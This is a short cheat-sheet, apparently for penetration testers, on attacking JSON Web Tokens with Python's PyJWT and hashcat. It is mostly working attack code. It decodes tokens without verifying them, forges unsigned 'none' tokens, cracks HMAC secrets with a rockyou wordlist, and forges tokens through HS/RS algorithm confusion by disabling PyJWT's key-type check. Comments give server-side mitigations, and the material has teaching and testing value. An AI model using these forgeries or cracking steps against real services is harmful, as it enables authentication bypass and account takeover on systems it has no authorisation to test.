JSON Web Token


JWT With Python

JWT Python 3 library, useful for exploits ;)
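# Quote the extras spec: an unquoted '[' is a glob character (zsh aborts with
# "no matches found"; bash expands it if a matching file exists in the cwd).
# The [crypto] extra pulls in the RSA/EC backend needed for RS*/ES* signatures.
python3 -m pip install --upgrade 'pyjwt[crypto]'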

READ JWT

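# Decode header + claims WITHOUT checking the signature (inspection only —
# a verifier must never disable verify_signature on tokens it acts upon).
# Read the raw token with read().strip(): str(readlines()) produced the repr of
# a list ("['eyJ...\n']"), which only decoded because base64 silently discards
# characters outside its alphabet.
echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzb21lIjoicGF5bG9hZCJ9.4twFt5NiznN84AWoo1d7KO1T_yoc0Z6XOpOVswacPZg" | python -c 'import sys,jwt;t=sys.stdin.read().strip();h=jwt.get_unverified_header(t);p=jwt.decode(t, options={"verify_signature": 0});print(f"{h}{p}")'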

NONE Algorithm

import jwt

claims = {'user': 'value'}

# alg "none": the token carries an empty signature segment, so any verifier
# that accepts "none" (or derives the algorithm from the token header) will
# trust these claims as-is. Server-side mitigation: pin the permitted
# algorithms on decode (e.g. jwt.decode(..., algorithms=["HS256"])) so that
# "none" is rejected outright.
unsigned_token = jwt.encode(claims, key=None, algorithm=None)
print(unsigned_token)  # eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VyIjoidmFsdWUifQ.

HMAC SHA512 Cracking

# Save the token to a file in the form hashcat's JWT mode (-m 16500) expects
printf '%s\n' 'eyJraWQiOiI2NDNlYTVhMy1kY2JmLTRhNDAtODkzYS0yYTliNTI3ZDNiZTUiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY2MDY1NjA5OH0.S0o9u2K26z0C6edZT0QirPPBcgY7pBi8hYACGW29k60' > jwt.txt

# Wordlist attack against the HMAC secret.
# A secret recoverable from rockyou is a weak-key finding: HMAC secrets should
# be generated with a CSPRNG at (at least) the hash output size and rotated.
hashcat -a0 -m 16500 jwt.txt /usr/share/wordlists/SecLists/Passwords/Leaked-Databases/rockyou.txt --potfile-path=potfile.txt

# Bruteforce (mask) attack; no mask given, so hashcat uses its default mask
hashcat -a3 -m 16500 jwt.txt --potfile-path=potfile.txt
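import jwt

payload = {'user': 'value'}
# Secret recovered by hashcat above (the sample token was signed with it).
password = 'secret1'
# HS512 — the original line said HS256, which cannot produce the printed token
# below (its header decodes to {"typ":"JWT","alg":"HS512"} and the signature is
# 64 bytes). Keep the algorithm consistent with the expected output.
# Defender's note: an HMAC key that a wordlist attack recovers gives no
# integrity at all; use a random key of at least the hash output size.
token = jwt.encode(payload, password, algorithm='HS512')
print(token) # eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJ1c2VyIjoidmFsdWUifQ.KM5d456Dfj9X_Uuch4faQUADvDofZ4Y1Lktsa6MTJgnaeEkhJ1F1E9ecgbLHkp69zeDmKdqlur0M4zSwJ0YG0A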

HMAC SHA512 & RSA512 Confusion

import jwt

claims = {'user': 'value'}

# PyJWT's HMACAlgorithm.prepare_key refuses keys that look like asymmetric
# key material (PEM/certificate) precisely to stop HS/RS confusion; this
# monkeypatch disables that check so the client side can mirror what a
# vulnerable verifier does: honouring the token's "alg": "HS512" and feeding
# its RSA *public* key into an HMAC check.
# Server-side mitigation: choose the verification key by its own type/kid and
# pin the algorithm that key was issued for — never take it from the header.
jwt.algorithms.HMACAlgorithm.prepare_key = lambda self, key: key

# The PEM public key, as bytes, plays the role of the HMAC secret
hmac_secret = "[...]PUBKEY[...]".encode()

print(jwt.encode(claims, hmac_secret, algorithm='HS512'))